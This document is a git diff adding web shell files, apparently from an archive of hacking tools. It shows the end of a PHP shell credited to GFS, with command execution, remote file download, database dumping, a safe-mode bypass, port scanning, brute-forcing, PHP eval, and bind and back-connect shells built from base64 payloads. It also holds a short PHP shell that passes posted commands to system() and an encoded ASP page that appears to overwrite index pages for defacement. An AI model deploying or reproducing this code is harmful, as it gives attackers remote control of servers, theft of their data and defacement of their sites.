+  $s="Uploading file ".$_POST['lfilename']." use the ".$box;
+  $res=up_file($_POST['lfilename'],$_POST['tfilename'],$_POST['box']);
+ }elseif($_POST['b_mydb']){                              //Âûâîäèì ñïèñîê ÁÄ
+  $s="show_exists_db";
+  $res=db_show($_POST['host'], $_POST['username'], $_POST['pass']);
+ }elseif ($_POST['b_runsql']){                           //Âûïîëíÿåì SQL çàïğîñ
+  $s="SQL: ".$sql;
+  $res=run_sql($_POST['sql'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+ }elseif($_POST['b_base']){                              //Âûâîäèì ñïèñîê òàáëèö
+  $s="show_exists_tables";
+  $res=show_tables($_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+ }elseif($_POST['b_table']){                             //Âûâîäèì äàìï òàáëèöû
+  $s="Dump of ".$_POST['tablename'];
+  $tablename=$_POST['tablename'];
+  if ($tablename!=""){
+   $res=dump_table($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+  }else
+   $res="Select table!";
+ }elseif($_POST['b_safe_fuck']){                        //Îáõîä áåçîïàñíîãî ğåæèìà
+  $s="Open file ".$sfilename." with MySQL:";
+  $res=safe_mode_fuck($_POST['sfilename'],$_POST['host'], $_POST['username'], $_POST['pass'], $_POST['dbname']);
+ }elseif($_POST['b_dfilename']){                        //Îáõîä áåçîïàñíîãî ğåæèìà
+  $s="Dump in ".$dfilename." from ".$_POST['tablename'].":";
+  $res=run_sql("SELECT * INTO OUTFILE '".addslashes($_POST['dfilename'])."' FROM ".$_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+ }
+ if ($host=="") {$host="localhost";}
+ if(isset($res)){
+  echo "<table BORDER=1 align=center>";
+  echo "<tr><td alling=center><b>".$s."</b></td></tr>";
+  echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
+  echo $res;
+  echo "</textarea></td></tr></table>";
+ }
+################## EXECUTE #####################################################
+ if(!$safe_mode){
+  $dir=getcwd();
+  echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+  echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+  echo "<table BORDER=1 align=center>";
+  echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>Run command: </b></td></tr><font size=-2>";
+  echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"\" name=\"cmd\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Run\" name=\"b_run\"></td></tr>";
+  echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"$dir\" name=\"wdir\"></td>";
+  echo "</tr></table></form>";
+ }
+ echo "<hr size=3 color=black>";
+#################### UPLOAD ####################################################
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>Upload files: </b></td></tr><font size=-2>";
+ if ($box==""){ $box="fopen";}
+ echo ("<tr><td alling=\"center\"><b>Use/from: </b><SELECT name=\"box\">");
+ echo("<OPTION>$box</option>");
+ echo("<OPTION value=\"PC\">PC</option>
+       <option value=\"WGET\">WGET</option><option value=\"FETCH\">
+       FETCH</option><option value=\"LYNX\">LYNX</option>
+       <option value=\"cURL\">cURL</option>
+       <option value=\"fopen\">fopen</option></select></td></tr>");
+ echo "<tr><td alling=\"center\"><b>File: </b><input type=\"text\" name=\"lfilename\" size=50></td></tr>";
+ echo "<tr><td alling=\"center\"><b>Target: </b><input type=\"text\" name=\"tfilename\"
+      size=30  value=\"$tfilename\"></td></tr>";
+ echo "<tr><td alling=\"center\"><input type=\"submit\" name=\"b_upload\" value=\"UPLOAD\"></td></tr></table></form></font></font>";
+ echo "<hr size=3 color=black>";
+##################### MySQL ####################################################
+ if(isset($_POST['host'])){
+  $host=$_POST['host'];
+ }
+ if(isset($_POST['dbname'])){
+  $dbname=$_POST['dbname'];
+ }
+ if(isset($_POST['tablename'])){
+  $tablename=$_POST['tablename'];
+ }
+ if(isset($_POST['sql'])){
+  $sql=$_POST['sql'];
+ }
+ if(isset($_POST['sfilename'])){
+  $filename=$_POST['sfilename'];
+ }
+ if(isset($_POST['dfilename'])){
+  $dfilename=$_POST['dfilename'];
+ }
+ if(isset($_POST['username'])){
+  $username=$_POST['username'];
+ }
+ if(isset($_POST['pass'])){
+  $pass=$_POST['pass'];
+ }
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>MySQL DB connect: </b></td></tr><font size=-2>";
+ echo "<tr><td alling=\"center\"><b>Host name:</b></td>";
+ echo "<td alling=\"center\"><b>DB name:</b></td>";
+ echo "<td alling=\"center\"><b>Table name:</b></td>";
+ echo "<td alling=\"center\"><b>SQL command: </b></td></tr>";
+ echo ("<tr><td alling=\"center\"><input type=\"text\" name=\"host\" value=\"$host\"></td>");
+ echo ("<td alling=\"center\"><input type=\"text\" name=\"dbname\" value=\"$dbname\"></td>");
+ echo ("<td alling=\"center\"><input type=\"text\" name=\"tablename\" value=\"$tablename\"></td>");
+ echo ("<td alling=\"center\"><input type=\"text\" name=\"sql\" value=\"$sql\"></td></tr>");
+ echo "<tr><td alling=\"center\"><b>User name:</b></tb>";
+ echo "<td alling=\"center\"><input type=\"submit\" name=\"b_base\" value=\"Dump DB\"></td>";
+ echo "<td alling=\"center\"><input type=\"submit\" name=\"b_table\" value=\"Dump table\"></td>";
+ echo "<td alling=\"center\"><input type=\"submit\" name=\"b_runsql\" value=\"Run SQL\"></tb></tr>";
+ echo ("<tr><td alling=\"center\"><input type=\"text\" name=\"username\" value=\"$username\"></td><td alling=\"center\"></td><td alling=\"center\"><input type=\"submit\" name=\"b_dtable\" value=\"Download\"></td></tr>");
+ echo "<tr><td alling=\"center\"><b>Pass: </b></td>";
+ if ($safe_mode){
+  echo "<td alling=\"center\"><b>OpenFilename: </b></td><td alling=\"center\"><b>DumpFilename: </b></td></tr>";
+ }else
+  echo "<td alling=\"center\"></td><td alling=\"center\"><b>DumpFilename: </b></td></tr>";
+ echo ("<tr><td alling=\"center\"><input type=\"text\" name=\"pass\" value=\"$pass\"></td>");
+ if ($safe_mode){
+  echo "<td alling=\"center\"><input type=\"text\" name=\"sfilename\" value=\"$filename\"></td><td alling=\"center\"><input type=\"text\" name=\"b_dfilename\" value=\"$dfilename\"></td></tr>";
+ }else
+  echo "<td alling=\"center\"></td><td alling=\"center\"><input type=\"text\" name=\"dfilename\" value=\"$dfilename\"></td></tr>";
+ echo ("<tr><td alling=\"center\"><input type=\"submit\" name=\"b_mydb\" value=\"Show exists DB\"></td>");
+ if ($safe_mode){
+  echo ("<td alling=\"center\"><input type=\"submit\" name=\"b_safe_fuck\" value=\"SafeMode FileOpen\"></td>");
+ }else
+  echo "<td alling=\"center\"></td>";
+ echo("<td alling=\"center\"><input type=\"submit\" name=\"b_dfilename\" value=\"Dump table\"></td>");
+ echo "</tr></table></font></font>";
+ echo "<hr size=3 color=black>";
+################## NAVIGATION ##################################################
+ list_dir();
+}
+##################### PortScan #################################################
+if($r_act=="port"){
+ if($_POST['host']==""){
+  $host="localhost";
+ }else
+  $host=$_POST['host'];
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>Scan host: </b></td></tr><font size=-2>";
+ echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"".$host."\" name=\"host\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Scan\" name=\"b_scan\"></td></tr>";
+ echo "</tr></table></form>";
+ if($_POST['b_scan']){
+  portscan($host);
+ }
+}
+##################### PortBind #################################################
+if($r_act=="bind"){
+ if($_POST['b_bind']){
+  if($_POST['box']=="C++"){
+   save_file(base64_decode($port_c),"/var/tmp/gfs.c",getcwd());
+   ex("gcc /var/tmp/gfs.c");
+   unlink("/var/tmp/gfs.c");
+   ex("/var/tmp/a.out ".$_POST['port']." &");
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center><b>".$s."</b></td></tr>";
+   echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
+   echo ex("ps -aux | grep a.out");
+   echo "</textarea></td></tr></table>";
+  }
+  if($_POST['box']=="Perl"){
+   save_file(base64_decode($port_pl),"/var/tmp/gfs.pl",getcwd());
+   ex("perl /var/tmp/gfs.pl ".$_POST['port']." &");
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center><b>".$s."</b></td></tr>";
+   echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
+   echo ex("ps -aux | grep gfs.pl");
+   echo "</textarea></td></tr></table>";
+  }
+ }
+ if($_POST['b_connect']){
+  if($_POST['box']=="C++"){
+   save_file(base64_decode($back_connect_c),"/var/tmp/gfs.c",getcwd());
+   ex("gcc -o /var/tmp/gfs.c /var/tmp/gfs");
+   unlink("/var/tmp/gfs.c");
+   ex("/var/tmp/gfs ".$_POST['ip']." ".$_POST['port']." &");
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center><b>".$s."</b></td></tr>";
+   echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
+   echo "Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...";
+   echo "</textarea></td></tr></table>";
+  }
+  if($_POST['box']=="Perl"){
+   save_file(base64_decode($back_connect_pl),"/var/tmp/gfs.pl",getcwd());
+   ex("perl /var/tmp/gfs.pl ".$_POST['ip']." ".$_POST['port']." &");
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center><b>".$s."</b></td></tr>";
+   echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
+   echo "Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...";
+   echo "</textarea></td></tr></table>";
+  }
+ }
+ if($_POST['b_proxy']){
+  save_file(stripslashes(base64_decode($prx1).$_POST['port'].base64_decode($prx2)),"/var/tmp/gfs.pl",getcwd());
+  ex("perl /var/tmp/gfs.pl");
+  echo "<table BORDER=1 align=center>";
+  echo "<tr><td alling=center><b>Proxy</b></td></tr>";
+  echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
+  echo ex("ps -aux | grep gfs.pl");
+  echo "</textarea></td></tr></table>";
+ }
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>Bind Port: </b></td></tr><font size=-2>";
+ echo ("<tr><td alling=\"center\"><b>Use: </b><SELECT name=\"box\">");
+ echo("<OPTION value=\"C++\">C++</option>
+       <option value=\"Perl\">Perl</option></select></td></tr>");
+ echo "<tr><td alling=\"center\"><b><font  face=Verdana size=2>BindPort: </b></td></tr><font size=-2>";
+ echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"26660\" name=\"port\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Bind\" name=\"b_bind\"></td></tr>";
+ echo "</tr></table></form>";
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>Back connect: </b></td></tr><font size=-2>";
+ echo ("<tr><td alling=\"center\"><b>Use: </b><SELECT name=\"box\">");
+ echo("<OPTION value=\"C++\">C++</option>
+       <option value=\"Perl\">Perl</option></select></td></tr>");
+ echo "<tr><td alling=\"center\"><b><font  face=Verdana size=2>RemotePort: </b></td></tr><font size=-2>";
+ echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"26660\" name=\"port\"></td></tr>";
+ echo "<tr><td alling=\"center\"><b><font  face=Verdana size=2>RemoteIp: </b></td></tr><font size=-2>";
+ echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"".$REMOTE_ADDR."\" name=\"ip\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Connect\" name=\"b_connect\"></td></tr>";
+ echo "</tr></table></form>";
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>HTTPProxy: </b></td></tr><font size=-2>";
+ echo "<tr><td alling=\"center\"><b><font  face=Verdana size=2>ProxyPort: </b></td></tr><font size=-2>";
+ echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"46660\" name=\"port\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Create\" name=\"b_proxy\"></td></tr>";
+ echo "</tr></table></form>";
+}
+##################### Brute ####################################################
+if($r_act=="brute"){
+ if(isset($_POST['brute_host'])){
+  $host=$_POST['brute_host'];
+ }else
+  $host="localhost";
+ if(isset($_POST['lib'])){
+  $lib=$_POST['lib'];
+ }else
+  $lib="  [library]";
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>Brute: </b></td></tr><font size=-2>";
+ echo "<tr bgcolor=#00ff00><td alling=\"center\"><b>Example lib: </b>login:pass</td></tr>";
+ echo ("<tr><td alling=\"center\"><b>Bryte type: </b><SELECT name=\"box1\">");
+ echo("<option value=\"login:login\">login:login</option>
+       <option value=\"login:nigol\">login:nigol</option>
+       <option value=\"login:empty\">login:empty</option>
+       <option value=\"login:number\">login:number</option>");
+ if(function_exists(fopen)){
+  echo "<option value=\"login:lib\">login:lib</option>";
+  echo "<option value=\"lib:lib\">lib:lib</option>";
+ }
+ echo ("</select></td></tr>");
+ echo ("<tr><td alling=\"center\"><b>Use: </b><SELECT name=\"box\">");
+ echo("<OPTION value=\"mysql\">mysql</option>
+       <option value=\"ftp\">ftp</option>");
+// if(function_exists(ssh2_connect)){
+//  echo "<option value=\"ssh\">ssh</option>";
+// }
+ echo ("</select></td>");
+ echo("<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Brute\" name=\"b_brute\"></td></tr><tr><td alling=\"center\"><b>Host: </b><input type=\"text\" name=\"brute_host\" value=\"".$host."\">(for lib:lib)</td></tr>");
+ if(function_exists(fopen)){
+  echo "<td alling=\"center\"><b>From lib (if set): <input type=\"text\" name=\"lib\" value=\"".$lib."\">";
+ }
+ echo ("</table></form>");
+ if($_POST['b_brute']){
+  brute($_POST['box'],$_POST['box1'],$_POST['brute_host'],$_POST['lib']);
+ }
+}
+#################### Eval ######################################################
+if($r_act=="eval"){
+ if($_POST['b_eval']){
+  $eval=str_replace("<?","",$_POST['php_eval']);
+  $eval=str_replace("?>","",$eval);
+  eval($eval);
+ }
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>Eval php: </b></td></tr><font size=-2>";
+ echo "<tr><td alling=\"center\"><textarea name=\"php_eval\" cols=90 rows=15></textarea></td></tr><tr><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Eval\" name=\"b_eval\"></td></tr>";
+ echo "</tr></table></form>";
+}
+
+echo "<hr size=3 color=black>";
+echo "<font  face=Verdana size=2 color=blue><b>";
+echo (rep_char("&nbsp",15));
+echo "(c) GFS</font>";
+echo (rep_char("&nbsp",15));
+echo "<a href=\"http://www.gfs-team.ru\">www.gfs-team.ru</a>";
+echo "<hr size=3 color=black>";
+?>
diff --git a/138shell/H/h4ntu shell [powered by tsoi].txt b/138shell/H/h4ntu shell [powered by tsoi].txt
new file mode 100644
index 0000000..eb61f3d
--- /dev/null
+++ b/138shell/H/h4ntu shell [powered by tsoi].txt	
@@ -0,0 +1,78 @@
+<title>h4ntu shell [powered by tsoi]</title>
+<?php
+echo "<p><font size=2 face=Verdana><b>This Is The Server Information</b></font></p>";
+?>
+
+<?php
+  closelog( );
+  $user = get_current_user( );
+  $login = posix_getuid( );
+  $euid = posix_geteuid( );
+  $ver = phpversion( );
+  $gid = posix_getgid( );
+  if ($chdir == "") $chdir = getcwd( );
+  if(!$whoami)$whoami=exec("whoami");
+?>
+<meta name="generator" content="Namo WebEditor v5.0">
+<br>
+<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0">
+<?php
+  $uname = posix_uname( );
+  while (list($info, $value) = each ($uname)) {
+?>
+  <TR>
+    <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><?= $info ?>: <?= $value ?></DIV></TD>
+  </TR>
+<?php
+  }
+?>
+  <TR>
+
+  <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>User Info:</b> uid=<?= $login ?>(<?= $whoami?>) euid=<?= $euid ?>(<?= $whoami?>) gid=<?= $gid ?>(<?= $whoami?>)</DIV></TD>
+  </TR>
+  <TR>
+  <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Current Path:</b> <?= $chdir ?></DIV></TD>
+
+  </TR>
+  <TR>
+  <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Permission Directory:</b> <? if(@is_writable($chdir)){ echo "Yes"; }else{ echo "No"; } ?></DIV></TD>
+  </TR>  
+  <TR>
+  <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Server Services:</b> <?= "$SERVER_SOFTWARE $SERVER_VERSION"; ?></DIV></TD>
+  </TR>
+
+  <TR>
+  <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Server Adress:</b> <?= "$SERVER_ADDR $SERVER_NAME"; ?></DIV></TD>
+  </TR>
+  <TR>
+  <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Script Current User:</b> <?= $user ?></DIV></TD>
+  </TR>
+  <TR>
+
+  <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>PHP Version:</b> <?= $ver ?></DIV></TD>
+  </TR>
+</TABLE>
+<BR>
+
+<font face="courier new" size="2" color="777777"><b>#</b>php injection: <br>
+</font><FORM name=injection METHOD=POST ACTION="<?php echo $_SERVER["REQUEST_URI"];?>">
+<font face="courier new" size="2" color="777777">cmd : 
+<INPUT TYPE="text" NAME="cmd" value="<?php echo stripslashes(htmlentities($_POST['cmd'])); ?>" size="161">
+<br>
+<INPUT TYPE="submit">
+</font></FORM>
+
+<hr color=777777 width=100% height=115px>
+
+<pre>
+<?
+$cmd = $_POST['cmd'];
+  if (isset($chdir)) @chdir($chdir);
+  ob_start();
+  system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
+  $output = ob_get_contents();
+  ob_end_clean();
+  if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
+exit;
+?>
+</pre>
diff --git a/138shell/I/Inderxer.asp.txt b/138shell/I/Inderxer.asp.txt
new file mode 100644
index 0000000..9f1e13b
--- /dev/null
+++ b/138shell/I/Inderxer.asp.txt
@@ -0,0 +1,74 @@
+<%@ LANGUAGE = VBScript.Encode %>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<meta http-equiv="Content-Language" content="tr">
+<title>WwW.SaNaLTeRoR.OrG - inDEXER And ReaDer</title>
+<%#@~^UgsAAA==^mVs,/DXV@#@&OEk'~J@!mnUD+D@*@!4M@*@!6G.:,l1YrWUx4YOw=&zShA klxCsD+.WM KDL,YmDoY{m4^lU3,:nO4WN{2WkY@*@!rUw!Y,YzwnxkE8:bOP7ls;'JEjz1)S:3"r]cr"MJrPkry'*c@*@!&WKD:@*E@#@&m\6xE@!1+	YnD@*@!6WUY,^W^W.x^k:n~kk"+{X@*?^MkaYP_l0Vıx9l@!4M@*@!WKxY,^W^WD{A4kD+,/rynxy@*@!z1nxD+.@*@!Vk@*$!PjmMraY~g+kx+,r^;şY!Dhl,CCV0ıP..k^:kş,#nXmP`x;Y;ssEş~?.\DsCMlPİU[6~bDhm3~j+,?+M\.Nm3rPz/2~BPw42PBPlk2aPTk(k~NGdHlslMıUPbç+.rğbxk~G0Ehl0~bçkU,XmyıVsışYıM @!(D@*@!^k@*$!P?1.kaYV~$kMPÇK3~?rOXnP`ğ.lşsl[C	P}C4s+O/b"1+~İ	N6PzYm8k^k./bxr"c`PUPPGW/D~jkD+^+.k~umDrçP*@!Vb@*j^MkwOr	PFE^smxısışı,İV0PAm3ışDCPnl.ışı3,Mnsm+0OkMR@!^r@*SüD0x~ArsTk~29rxs+V~İçbxPF;^VCxsC,|ısm\!yE	E,63!X;x!y  c@!4M@*@!1+xDn.@*@!k@*AzP\n4NrJ@#@&3!VsC	k:xE@!mnxDnM@*@!6W	YP1W^GD{Vr:Pdr.+'l@*|!VVmUıhP~k^orVn.b@!8D@*@!0KxO~1WVG.{h4kDn,/r.+{ @*@!z1nxD+.@*@!0GUDP/b"+{F@*@!sr@*g+MNnx_~~E.lHCPzYC^mğıxıy~r	Nn6b~Tk.bx,`bDl1Cğıxı.Prx9+a~n+x9rPUkYUry9+,rs:Csı*ÖDU)Gn0mEsOcl/2@!^k@*1.XnQP~EPnı/sCPİ	Nn6bPuC	ok,jkD+X~)Ymmm3dlUı",WUE	~XDrUbPXC"mmC3kıUı.Pö.	P=PRczc zmVrxbxdrD+/b mK:P@!C~tM+6'_W.U3@*@!6GxDP^G^WDxsb:n@*G)_b~wb\Sb,ÖIg3|,"Z@!Jl@*@!J0W	O@*@!Vk@*6VE,g,A;DCzmPG3!hl0PrdD+Nnğr	k"PGGkXC	ıx,bNı	ıPjnPI+.k	k~emyıx,@!l,tDWxgKD	+V @*@!6WUY,^W^W.x^k:n@*Gbub,oz}JzPÖ"12nR@!&l@*@!&0KxO@*@!4D@*@!mxY.@*AHP@!l~t.n6'hlbsYK)hCbV4Gh(@$4WDhmkscmK:gkE(%+1Yxk	NnaD@*tnt9k@!JC@*@!(D@*?2+^rmV~K4Cx0/~PKPCGsHfn:KU,~30WMW:mx,SP_kO4mXOCMP~GnVb0kşVE@#@&mKwz'E@!1+UY.@*@!0GUDPmGsKDxVbhPdby'*@*Ksk6Pul03ı@!8M@*@!6GxDPmKsGD{h4kO+~dbyn'y@*@!JmnUD+D@*@!^k@*A!~Um.bwDPHt9rP:l.l6ıx[C	P5m"ıVsışYıDc@!sk@*fğ+.Vr~:lVı:,)D0l[Cş^lDıh~_WsXGnsWUvb9:k	#,SPA3GDK:CU,`sc6RqPl9hrxbP*PSPurD4CXDCDv?CUmVb.n	l~b9hbxr*PBPfVbWkş3~`UlUC^bDUl,bNsrUk*PBPPE.C	/G0D~`:E.C	/WWOcKVPz[skUb#,~Pg+K~.PPü:,b[CsPr^Cx^lDm~P+ş30üDs+. c@!sk@*$E,?^.bwY~)kVCP@!WKxO,mKVWM'^r:@*JWTPcVmXıY*~@!J0W	O@*K!Ysl"R@!sb@*3L9nDbx~ezwYığı~$!xCP~n	ynMPUmDbwD~KüsP$k^orsDk,JWTVEHG.P~k^orxr"R Rv$E,KCVısNlU~UmGD^nXP9xxPdlsnD,\nPAL[nMPSmh+MkP:üh~Aİ^obVnDr~dWLV!zWMVC.*@!Vr@*Vü\nx^r,ArMPUmDbwD~İçk	Pjl9+^n,?K,dmMkwDsnDbxbPFEssmxhl	ı"ıPÖ	+.rMky E@#@&sk	V^+.{J@!m+	Y.@*@!0GxDP^G^WD{sks+Pkr"+{*@*fG/O~UkO+^nD@!4.@*@!0WUO,mGVK.{h4bYP/byx @*@!&mxOnM@*@!^r@*ShhcdCxmVD+.W. KDL@!^r@*ShA 6lY4nMWWh8cmGs@!^k@*ShS /mxCVmDnUmRmKh@!^k@*SAARDEMlU/GWDRO3@!sk@*hAAcYl4.b4CYc^K:@!^k@*hhSRbdVm:CtbyhnDRmKh@!^k@*SAAR4lMEUXC4Hl WML@!1+UOD@*@!WKxOP1G^W.{DNPkk.n'W@*Jbt2]~UİK2d3Iİ@!zmUO+M@*@!4.@*@!WKxOPkry'+@*@!Vk@*ASh /m8KYCT+ Y+m:cGDTPSPShA kl\kC3cmWs~SPShSRhkUr6 xOJ@#@&GLP'~];;+kOcp;DH?YMk	L@#@&kWPKon~{PJr~Y4+x@#@&^l^V,:CkU@#@&+s/r0,WLn,'PE!Kx[+ME,Y4x@#@&mmV^~mm/nF@#@&nsk+k6~WT+P{~EW0ErPOtnU@#@&^l^sP1ldny@#@&nsk+r0,GT+~{Prtl03bUNmJ~Y4+U@#@&ml^sP1l/f@#@&Vk+r0~GT+~',E3!VsC	k:E~Dtnx@#@&1ls^P1l/c@#@&+^/nk6PGLP',EmKwXr~Otx@#@&^lss,mC/X@#@&+sdk0~GT+~',E^kU0VDJ,Y4nx@#@&^l^V~^m/++@#@&V/rWPKoPxPEGMxn3r~Y4+U@#@&mlss,mC/{@#@&n^/k0,WTnP{PEWMxnVyJPD4+	@#@&1CsV,mm/n%@#@&x[PbW@#@&/;8,:lrUS40DAA==^#~@%>
+<center>
+<br><br><br><br><br><br><br><br>
+<br><br><br><br><br><br><br><br>
+<hr color=lime width=50%>
+<SCRIPT LANGUAGE="JavaScript">
+ <!-- 
+function Start(page)
+ {
+ OpenWin = this.open(page, "CtrlWindow","toolbar=menubar=No,scrollbars=No,status=No,height=250,");
+ }
+ //-->
+</SCRIPT>
+<script language="JavaScript1.2">
+var message="SaNaLTeRoR - İnDexEr - Reader"
+var typingbasecolor="red"
+var typingtextcolor="lime"
+var blinkspeed=598 
+var fontface="arial,geneva,helvetica"
+var fontsize="5"
+var n=0
+if (document.all){
+document.write('<font face="'+fontface+'" size="'+fontsize+'" color="'+typingbasecolor+'">')
+for (m=0;m<message.length;m++)
+document.write('<span id="typinglight">'+message.charAt(m)+'</span>')
+document.write('</font>')
+var tempref=document.all.typinglight
+}
+else
+document.write(message)
+function typing(){
+if (n==0){
+for (m=0;m<message.length;m++)
+tempref[m].style.color=typingbasecolor
+}
+tempref[n].style.color=typingtextcolor
+if (n<tempref.length-1)
+n++
+else{
+n=0
+clearInterval(blinking)
+setTimeout("starttyping()",1500)
+return
+}
+}
+function starttyping(){
+if (document.all)
+blinking=setInterval("typing()",blinkspeed)
+}
+starttyping()
+</script> 
+<form action="?Gonder" method="post">
+<center><table>
+<td>Nerden :<td><input type="text" name="nerden" size=25 value=index.html></td>
+<td><input type="submit" onclick="submit()" value="Veriyi Gönder"></td><tr>
+<td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input type="reset" onclick="reset" value="    Temizle    "></td><tr>
+</form>
+<form action="?oku" method="post">
+<td><font color=pink>Oku :</font><td><input type="text" name="klasor" size=25 value=<%=#@~^LQAAAA==.;;/DR/D7nD7l.km4snk`JzKnd{n_ejq;bd{KbPur#kQ8AAA==^#~@%>></td><td><input type="submit" onclick="submit()" value="  Veriyi Oku   "></td><tr>
+</form>
+</table><br>
+<a href="javascript:void(0);" onclick="javascript:Start ('?hakkinda');">
+Script Hakkında </a> - <a href="javascript:void(0);" onclick="javascript:Start ('?kullanim');">Kullanım Bilgileri </a>- <a href="javascript:void(0);" onclick="javascript:Start ('?copy');">Copright</a> -<a href="javascript:void(0);" onclick="javascript:Start ('?linkler');"> Linkler</a>
+<br><br><br>
+<hr color=lime width=50%>
